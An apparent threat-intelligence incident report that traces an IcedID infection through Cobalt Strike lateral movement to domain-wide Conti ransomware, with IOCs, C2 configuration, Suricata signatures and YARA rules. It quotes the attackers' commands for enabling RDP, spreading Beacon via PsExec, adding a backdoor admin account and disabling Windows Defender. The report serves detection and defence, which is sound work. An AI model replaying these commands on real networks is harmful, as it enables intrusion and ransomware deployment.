Introduction
First seen in May 2020, Conti ransomware has quickly become one of the most common ransomware variants, according to Coveware. As per Coveware’s Quarterly Ransomware Report (Q1 2021), Conti has the 2nd highest market share after Sodinokibi, which we wrote about here.
In April, we saw a threat actor go from an initial IcedID infection to deploying Conti ransomware domain wide in two days and 11 hours. The threat actors stayed dormant for most of this time, before jumping into action on an early Saturday morning. The hands on keyboard activity lasted for two and a half hours. They utilized RDP, PsExec, and Cobalt Strike to move laterally within the environment before executing Conti in memory across all active systems.
Summary
We assess with moderate confidence that the initial vector used by the threat actor was a zip file, which included a malicious JavaScript file, delivered through a phishing campaign. The JavaScript file would eventually download and execute the IcedID malware. Discovered in 2017, what started as a commodity malware is now currently being deployed as an initial access broker by ransomware threat actors.
While there was some initial discovery activity from the IcedID malware, it went quite, just beaconing to command and control but not performing any other activity. After being dormant for over two days, a Cobalt Strike Beacon was dropped and executed on the system infected with IcedID. The threat actors then ran another round of discovery activity with native windows utilities such as nltest.exe, whoami.exe, and net.exe. They then successfully escalated to SYSTEM privileges via Cobalt Strike’s built-in “named pipe impersonation” (GetSystem) functionality.
The threat actors continued by moving laterally to the domain controllers on the network using SMB to transfer and execute a Cobalt Strike Beacon. During that time, we observed port scanning activity from one of the domain controllers, to identify open ports such as SSH, SMB, MSSQL, RDP and WinRM. After a brief gap of 15 minutes, the threat actors used PsExec, to copy and execute a Cobalt Strike Beacon DLL on most of the systems in the network.
Later in the attack, the threat actor was seen establishing RDP connections from the beachhead host to the domain controller and other systems throughout the environment. This RDP activity was being proxied through the IcedID process running on that host, to a remote proxy over port 8080.
To establish persistence, the attackers created a new local user on one of the domain controllers and added it to the Administrators group. Additionally, in an effort to evade any detection and prevention mechanisms, they disabled Windows Defender via a group policy modification.
Within two and a half hours of Cobalt Strike showing up in the environment and just over two days after the initial IcedID infection, the threat actors completed their objective of encrypting all systems. Conti was executed in memory with the help of the Cobalt Strike Beacons domain wide. The ransomware note left by the infection included a link to their Tor site for further details.
After further review of the environment (post ransom), we realized multiple systems were unable to be accessed and would not have been restorable even if the ransom had been paid, including a domain controller.
Services
We offer multiple services including a Threat Feed service which tracks Cobalt Strike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here.
We also have artifacts available from this case such as pcaps, memory captures, files, Kape packages, and more, under our Security Researcher and Organization services.
Timeline
Analysis and reporting completed by @pigerlin, @MetallicHack, @yatinwad, and 1 unnamed contributor.
Reviewed by @kostastsale, @RoxpinTeddy, and @TheDFIRReport
MITRE ATT&CK
Initial Access
The IcedID DLL that we executed was most likely dropped through a zip file, which included a JavaScript file within it. Brad had a few posts about these around the time of this intrusion. 1 2 Thanks Brad!
Various attributes including the computer name and the OS version of the compromised system were sent through encoded cookie values.
IcedID was executed via rundll32.exe and ran command and control over port 443 for the duration of the intrusion.
rundll32.exe "C:\Users\REDACTED\AppData\Local\Temp\rate_x32.dat",update /i:"LaborBetray\license.dat"
Discovery
IcedID ran initial discovery after being executed on the beachhead. Various commands were executed to gather more information about the compromised environment; including the currently logged on user, domain trusts, groups, etc . 
ipconfig /all
systeminfo
whoami /groups
net config workstation
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all
new group "Domain Admins" /domain
Additional discovery commands were executed by Cobalt Strike.
cmd.exe /C whoami /groups
cmd.exe /C query session
cmd.exe /C dir %HOMEDRIVE%%HOMEPATH%
cmd.exe /C nltest /domain_trusts
cmd.exe /C nltest /dclist:
cmd.exe /C net group "Enterprise admins" /domain
cmd.exe /C net group "Domain admins" /domain
After moving laterally to a domain controller, they began looking for what networks were present in the environment using dsquery.
cmd.exe /C dsquery subnet -limit 0
Shortly thereafter, port scanning was observed coming from a domain controller looking for common ports (such as SSH, SMB, MSSQL, WinRM and RDP, etc.) on systems residing in the same subnet.
Privilege Escalation
In order to obtain SYSTEM level privileges, Cobalt Strike’s built-in named piped impersonation (GetSystem) was used:
Image: “C:\Windows\System32\cmd.exe”
CommandLine: “C:\Windows\system32\cmd.exe /c echo 4d64fbbbf34 > \\. \pipe\b4312c”
ParentImage: “C:\Windows\System32\runonce.exe”
ParentCommandLine: “C:\Windows\system32\runonce.exe
Lateral Movement
The threat actor began lateral movement using remote execution of Cobalt Strike Beacon service binaries.
Image: C:\Windows\system32\services.exe
TargetObject: HKLM\System\CurrentControlSet\Services\d8d6deb\ImagePath
Details: \\HOSTNAME\ADMIN$\d8d6deb.exe
After this initial activity, Cobalt Strike was used to enable RDP, and allow it through the firewall, on the domain controllers.
cmd.exe /C reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
cmd.exe /C netsh firewall set service type = remotedesktop mode = enable
cmd.exe /C netsh firewall set rule group="remote desktop" new enable=Yes
cmd.exe /C netsh advfirewall set rule group="remote desktop" new enable=Yes
Following this, the threat actors then copied a Cobalt Strike Beacon DLL to the ADMIN$ share; and then, distributed it throughout the environment using PsExec.
cmd.exe /C copy 192145.dll \\<INTERNAL_IP>\ADMIN$ /Y /Z
psexec.exe -accepteula -d -s \\<INTERNAL_IP> rundll32.exe C:\windows\192145.dll,StartW
From here, RDP connections were established from the beachhead host to systems throughout the environment. The connections were proxied through the IcedID process.
The threat actor used a redirector (38.135.122[.]194:8080) to proxy the RDP traffic being passed through the IcedID process. The below traffic shows more details of the RDP session, including the username in the cookie.
This proxied traffic reported back the hostname of the threat actors machine as “mikespc”. We’re looking for you Mike! 😉
Defense Evasion
To evade detection, the threat actors disabled Windows Defender by adding the below to an already linked GPO. They then force updated the GPO on all clients using Cobalt Strike.
| ParentCommandLine | CommandLine |
| C:\Windows\System32\dllhost.exe | C:\Windows\system32\cmd.exe /C gpupdate /force |
| C:\Users\USER\AppData\Local\Temp\icju1.exe | C:\Windows\system32\cmd.exe /C gpupdate /force |
| C:\Windows\System32\dllhost.exe | C:\Windows\system32\cmd.exe /C gpupdate /force |
| “rundll32.exe” c:\windows\192145.dll,StartW | C:\Windows\system32\cmd.exe /C gpupdate /force |
| Registry Keys | Action |
| HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware | DeleteValue |
| HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableRealtimeMonitoring | DeleteValue |
| HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableBehaviorMonitoring | DeleteValue |
| HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Monitoring\DisableIntrusionPreventionSystem | DeleteValue |
| HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | DeleteKey |
In addition, other security services were stopped or uninstalled.
NET STOP "redacted"
EventID: 13
Description: RegistryEvent (Value Set)
TargetObject: HKLM\System\CurrentControlSet\Services\<redacted>\Start
Value: DWORD (0x00000004)
Command and Control
IcedID
68.183.20[.]194:80
vaclicinni[.]xyz
83.97.20[.]160:443
oxythuler[.]cyou
expertulthima[.]club
dictorecovery[.]cyou
thulleultinn[.]club
Key identifier: 82:92:07:FD:86:23:FE:26:0E:4A:42:5A:F7:C7:70:2A:45:4E:01:5B
Not Before: Apr 22 15:27:02 2021 GMT
Not After : Apr 22 15:27:02 2022 GMT
CommonName: localhost
City= AU
State= Some-State
Org = Internet Widgits Pty Ltd
ja3: a0e9f5d64349fb13191bc781f81f42e1
ja3s: ec74a5c51106f0419184d0dd08fb05bc
159.89.140[.]116:443
oxythuler[.]cyou
thulleultinn[.]club
Key Identifier: A4:EB:95:C2:04:91:E3:AF:67:7C:5D:B3:CB:DB:E3:38:90:5E:A7:68
Not Before: Apr 13 14:59:41 2021 GMT
Not After : Apr 13 14:59:41 2022 GMT
CommonName: localhost
City= AU
State= Some-State
Org = Internet Widgits Pty Ltd
ja3: a0e9f5d64349fb13191bc781f81f42e1
ja3s: ec74a5c51106f0419184d0dd08fb05bc
Cobalt Strike
192.99.178[.]145:80
dimentos[.]com
Config:
Port 443:"Spawn To x86": "%windir%\\syswow64\\runonce[.]exe",
"Spawn To x64": "%windir%\\sysnative\\runonce[.]exe",
"Jitter": 39,
"Method 2": "POST", "Port": 443,
"Beacon Type": "8 (HTTPS)",
"Polling": 62719,
"HTTP Method Path 2": "/btn_bg",
"Method 1": "GET",
"C2 Server": "dimentos[.]com,/FAQ""Spawn To x86": "%windir%\\syswow64\\runonce[.]exe",
"Spawn To x64": "%windir%\\sysnative\\runonce[.]exe",
"Jitter": 39,
"Method 2": "POST",
"Port": 443,
"Beacon Type": "8 (HTTPS)",
"Polling": 62719,
"HTTP Method Path 2": "/btn_bg",
"Method 1": "GET",
"C2 Server": "dimentos[.]com,/bg"Port 80:
"Spawn To x86": "%windir%\\syswow64\\runonce[.]exe",
"Spawn To x64": "%windir%\\sysnative\\runonce[.]exe",
"Jitter": 39,
"Method 2": "POST",
"Port": 80,
"Beacon Type": "0 (HTTP)",
"Polling": 62719,
"HTTP Method Path 2": "/btn_bg",
"Method 1": "GET",
"C2 Server": "192[.]99[.]178[.]145,/r-arrow""Spawn To x86": "%windir%\\syswow64\\runonce[.]exe",
"Spawn To x64": "%windir%\\sysnative\\runonce[.]exe",
"Jitter": 39,
"Method 2": "POST",
"Port": 80,
"Beacon Type": "0 (HTTP)",
"Polling": 62719,
"HTTP Method Path 2": "/btn_bg",
"Method 1": "GET",
"C2 Server": "192[.]99[.]178[.]145,/bg"
Persistence
An account named “nuuser” was created by one of the Cobalt Strike Beacons. As these commands were run on a domain controller, it essentially added the account to the Built-in Administrators domain group, granting it administrative privileges in the AD domain.
net user /add /Y nuuser [email protected]
net localgroup administrators nuuser /add
Credential Access
LSASS was accessed by an unusual process “runonce.exe” on multiple hosts, including a domain controller.
EventID: 10
Description: Process Access
SourceImage: “C:\Windows\System32\runonce.exe”
TargetImage: “C:\Windows\system32\lsass.exe”
SourceImage: C:\Windows\system32\runonce.exe"
TargetImage: "C:\Windows\system32\lsass.exe"
GrantedAccess: 0x1010
CallTrace: "C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|UNKNOWN(0000028A62BDC798)"
The overpass-the hash technique was used to acquire a valid Kerberos ticket for the administrator user.
Impact
About two and a half hours after initial hands on keyboard activity, the Cobalt Strike Beacon processes running across the target systems injected the Conti DLL into memory. Conti deployments using a DLL seem to have first started showing up in December 2020.
First time that I see #Conti ransomware spread as a DLL :
— (づ。◕‿‿◕。)づ (@Glacius_) December 8, 2020
Hash : 5c278c04bb19196dc8559d45b9728b3ba0c1bc5cdd20a766f56248e561c6f5a6
Pdb : A:sourceconti_v3x64Releasecryptor_dll.pdb
(cc @GrujaRS @malwrhunterteam ) pic.twitter.com/gH3uCpVMpB
Some traces of this particular DLL were found in the memory dump taken from one of the compromised systems.
We were unable to reconstruct the DLL from memory but Maxime Thiebaut (@0xThiebaut) from NVISO helped us out. The Yara rule, located in the detections section below was made possible due to him reconstructing the DLL. Thanks Maxime!
Conti scans the network for 445/SMB, looking for machines to encrypt.
Ransom note
Which leads you here.
The threat actors asked for 150k and could have been talked down at least ~20%.
Multiple machines within the environment were not usable after being ransomed including a domain controller. The machines were left like this and you were not able to do anything but press control+alt+delete. Paying the ransom will not help you here.
Pivots
While researching the infrastructure related to this campaign, we found the threat actor revealed further infrastructure. The domain associated with the Cobalt Strike C2 (dimentos[.]com) has an unredacted Whois record that reveals several other domains also registered by the address pokix19891[@]kindbest[.]com. You’ll notice the fake address and fake phone number as well.
All the domains were registered on 2021-03-30, and according to public data available in VirusTotal, three of them have been associated with Cobalt Strike infrastructure so far; the domain seen in this intrusion, powelin[.]com and awesents[.]com.
The two other domains (jocinet[.]com, ilimennt[.]com) have subdomains that look like name servers (ns1 and ns2), which were pointed to two of the Cobalt Strike hosting IP’s. All of this infrastructure was hosted on the VPS provider OVH.
IOCs
Files
b52c0640957e5032b5160578f8cb99f9b066fde4f9431ee6869b2eea67338f28.dll.exe
b52c0640957e5032b5160578f8cb99f9b066fde4f9431ee6869b2eea67338f28icju1.exe
e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06rate_x32.dat
eb79168391e64160883b1b3839ed4045b4fd40da14d6eec5a93cfa9365503586192145.dll
f29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9
Network
IcedID
vaclicinni[.]xyz
thulleultinn[.]club
oxythuler[.]cyou
dictorecovery[.]cyou
expertulthima[.]club
68.183.20[.]194:80
159.89.140[.]116:443
83.97.20[.]160:443
Cobalt Strike
dimentos[.]com
192.99.178[.]145:80
Proxy
38.135.122[.]194:8080
Detections
Surricata
ET MALWARE Win32/IcedID Requesting Encoded Binary M4ET MALWARE W32/Photoloader.Downloader Request Cookie
ET POLICY PE EXE or DLL Windows file download HTTP
ET INFO Executable Retrieved With Minimal HTTP Headers – Potential Second Stage Download
ET INFO Packed Executable Download
ET POLICY OpenSSL Demo CA – Internet Widgits Pty
ATTACK [PTsecurity] Overpass the hash. Encryption downgrade activity to ARCFOUR-HMAC-MD5
ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET SCAN Behavioral Unusual Port 1434 traffic Potential Scan or Infection
ET SCAN Behavioral Unusual Port 1435 traffic Potential Scan or Infection
Sigma
Sigma Rule Converter for SIEMs and EDRs: https://uncoder.io/
YARA
/*
YARA Rule Set
Author: The DFIR Report
Date: 2021-05-09
Identifier: 3584
Reference: https://thedfirreport.com
*//* Rule Set ----------------------------------------------------------------- */
import "pe"
rule icedid_rate_x32 {
meta:
description = "files - file rate_x32.dat"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-05-09"
hash1 = "eb79168391e64160883b1b3839ed4045b4fd40da14d6eec5a93cfa9365503586"
strings:
$s1 = "UAWAVAUATVWSH" fullword ascii
$s2 = "UAWAVVWSPH" fullword ascii
$s3 = "AWAVAUATVWUSH" fullword ascii
$s4 = "update" fullword ascii /* Goodware String - occured 207 times */
$s5 = "[email protected]@YAHXZ" fullword ascii
$s6 = "[email protected]@YAHXZ" fullword ascii
$s7 = "PluginInit" fullword ascii
$s8 = "[]_^A\\A]A^A_" fullword ascii
$s9 = "e8[_^A\\A]A^A_]" fullword ascii
$s10 = "[_^A\\A]A^A_]" fullword ascii
$s11 = "Kts=R,4iu" fullword ascii
$s12 = "mqr55c" fullword ascii
$s13 = "R,4i=Bj" fullword ascii
$s14 = "Ktw=R,4iu" fullword ascii
$s15 = "Ktu=R,4iu" fullword ascii
$s16 = "Kt{=R,4iu" fullword ascii
$s17 = "KVL.Mp" fullword ascii
$s18 = "Kt|=R,4iu" fullword ascii
$s19 = "=8c[Vt8=" fullword ascii
$s20 = "Ktx=R,4iu" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 700KB and
( pe.imphash() == "15787e97e92f1f138de37f6f972eb43c" and ( pe.exports("[email protected]@YAHXZ") and pe.exports("?[email protected]@YAHXZ") and pe.exports("PluginInit") and pe.exports("update") ) or 8 of them )
}rule conti_cobaltstrike_192145 {
meta:
description = "files - file 192145.dll"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-05-09"
hash1 = "29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9"
strings:
$x1 = "cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj>\"%s\"&exit" fullword ascii
$s2 = "veniamatquiest90.dll" fullword ascii
$s3 = "Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum" fullword ascii
$s4 = "Quaerat tempora culpa provident" fullword ascii
$s5 = "Velit consequuntur quisquam tempora error" fullword ascii
$s6 = "Quo omnis repellat ut expedita temporibus eius fuga error" fullword ascii
$s7 = "Dolores ullam tempora error distinctio ut natus facere quibusdam" fullword ascii
$s8 = "Corporis minima omnis qui est temporibus sint quo error magnam" fullword ascii
$s9 = "Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit" fullword ascii
$s10 = "Rerum tenetur sapiente est tempora qui deserunt" fullword ascii
$s11 = "Sed nulla quaerat porro error excepturi" fullword ascii
$s12 = "Aut tempore quo cumque dicta ut quia in" fullword ascii
$s13 = "Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut" fullword ascii
$s14 = "Tempore possimus aperiam nam mollitia illum hic at ut doloremque" fullword ascii
$s15 = "Dolorum eum ipsum tempora non et" fullword ascii
$s16 = "Quas alias illum laborum tempora sit est rerum temporibus dicta et" fullword ascii
$s17 = "Et quia aut temporibus enim repellat dolores totam recusandae repudiandae" fullword ascii
$s18 = "Sed velit ipsa et dolor tempore sunt nostrum" fullword ascii
$s19 = "Veniam voluptatem aliquam et eaque tempore tenetur possimus" fullword ascii
$s20 = "Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and
( pe.imphash() == "5cf3cdfe8585c01d2673249153057181" and pe.exports("StartW") or ( 1 of ($x*) or 4 of them ) )
}rule conti_cobaltstrike_icju1 {
meta:
description = "files - file icju1.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-05-09"
hash1 = "e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06"
strings:
$x1 = "cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj>\"%s\"&exit" fullword ascii
$s2 = "veniamatquiest90.dll" fullword ascii
$s3 = "Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum" fullword ascii
$s4 = "Quaerat tempora culpa provident" fullword ascii
$s5 = "Velit consequuntur quisquam tempora error" fullword ascii
$s6 = "Quo omnis repellat ut expedita temporibus eius fuga error" fullword ascii
$s7 = "Dolores ullam tempora error distinctio ut natus facere quibusdam" fullword ascii
$s8 = "Corporis minima omnis qui est temporibus sint quo error magnam" fullword ascii
$s9 = "Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit" fullword ascii
$s10 = "Rerum tenetur sapiente est tempora qui deserunt" fullword ascii
$s11 = "Sed nulla quaerat porro error excepturi" fullword ascii
$s12 = "Aut tempore quo cumque dicta ut quia in" fullword ascii
$s13 = "Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut" fullword ascii
$s14 = "Tempore possimus aperiam nam mollitia illum hic at ut doloremque" fullword ascii
$s15 = "Dolorum eum ipsum tempora non et" fullword ascii
$s16 = "Quas alias illum laborum tempora sit est rerum temporibus dicta et" fullword ascii
$s17 = "Et quia aut temporibus enim repellat dolores totam recusandae repudiandae" fullword ascii
$s18 = "Sed velit ipsa et dolor tempore sunt nostrum" fullword ascii
$s19 = "Veniam voluptatem aliquam et eaque tempore tenetur possimus" fullword ascii
$s20 = "Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and
( pe.imphash() == "a6d9b7f182ef1cfe180f692d89ecc759" or ( 1 of ($x*) or 4 of them ) )
}rule conti_v3 {
meta:
description = "conti_yara - file conti_v3.dll"
author = "pigerlin"
reference = "https://thedfirreport.com"
date = "2021-05-09"
hash1 = "8391dc3e087a5cecba74a638d50b771915831340ae3e027f0bb8217ad7ba4682"strings:
$s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s2 = "conti_v3.dll" fullword ascii
$s3 = " <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
$s4 = " Type Descriptor'" fullword ascii
$s5 = "operator co_await" fullword ascii
$s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
$s7 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
$s8 = " Base Class Descriptor at (" fullword ascii
$s9 = " Class Hierarchy Descriptor'" fullword ascii
$s10 = " Complete Object Locator'" fullword ascii
$s11 = " delete[]" fullword ascii
$s12 = " </trustInfo>" fullword ascii
$s13 = "__swift_1" fullword ascii
$s15 = "__swift_2" fullword ascii
$s19 = " delete" fullword asciicondition:
uint16(0) == 0x5a4d and filesize < 700KB and
all of them}
rule conti_cobaltstrike_192145_icju1_0 {
meta:
description = "files - from files 192145.dll, icju1.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-05-09"
hash1 = "29bc338e63a62c24c301c04961084013816733dad446a29c20d4413c5c818af9"
hash2 = "e54f38d06a4f11e1b92bb7454e70c949d3e1a4db83894db1ab76e9d64146ee06"
strings:
$x1 = "cmd.exe /c echo NGAtoDgLpvgJwPLEPFdj>\"%s\"&exit" fullword ascii
$s2 = "veniamatquiest90.dll" fullword ascii
$s3 = "Quaerat magni assumenda nihil architecto labore ullam autem unde temporibus mollitia illum" fullword ascii
$s4 = "Quaerat tempora culpa provident" fullword ascii
$s5 = "Dolores ullam tempora error distinctio ut natus facere quibusdam" fullword ascii
$s6 = "Velit consequuntur quisquam tempora error" fullword ascii
$s7 = "Corporis minima omnis qui est temporibus sint quo error magnam" fullword ascii
$s8 = "Quo omnis repellat ut expedita temporibus eius fuga error" fullword ascii
$s9 = "Officia sit maiores deserunt nobis tempora deleniti aut et quidem fugit" fullword ascii
$s10 = "Rerum tenetur sapiente est tempora qui deserunt" fullword ascii
$s11 = "Sed nulla quaerat porro error excepturi" fullword ascii
$s12 = "Aut tempore quo cumque dicta ut quia in" fullword ascii
$s13 = "Doloribus commodi repudiandae voluptates consequuntur neque tempora ut neque nemo ad ut" fullword ascii
$s14 = "Tempore possimus aperiam nam mollitia illum hic at ut doloremque" fullword ascii
$s15 = "Et quia aut temporibus enim repellat dolores totam recusandae repudiandae" fullword ascii
$s16 = "Dolorum eum ipsum tempora non et" fullword ascii
$s17 = "Quas alias illum laborum tempora sit est rerum temporibus dicta et" fullword ascii
$s18 = "Sed velit ipsa et dolor tempore sunt nostrum" fullword ascii
$s19 = "Veniam voluptatem aliquam et eaque tempore tenetur possimus" fullword ascii
$s20 = "Possimus suscipit placeat dolor quia tempora voluptas qui fugiat et accusantium" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) and 4 of them )
) or ( all of them )
}
MITRE:
Command and Scripting Interpreter – T1059
External Proxy – T1090.002
Remote Desktop Protocol – T1021.001
OS Credential Dumping – T1003
Pass the Hash – T1550.002
Service Execution – T1569.002
SMB/Windows Admin Shares – T1021.002
Data Encrypted for Impact – T1486
System Owner/User Discovery – T1033
Permission Groups Discovery – T1069
Application Layer Protocol – T1071
Process Injection – T1055
Group Policy Modification – T1484
Access Token Manipulation – T1134
Create Account – T1136
Remote System Discovery – T1018
Network Service Scanning – T1046
Domain Account – T1087.002
Impair Defenses – T1562
Internal case: 3584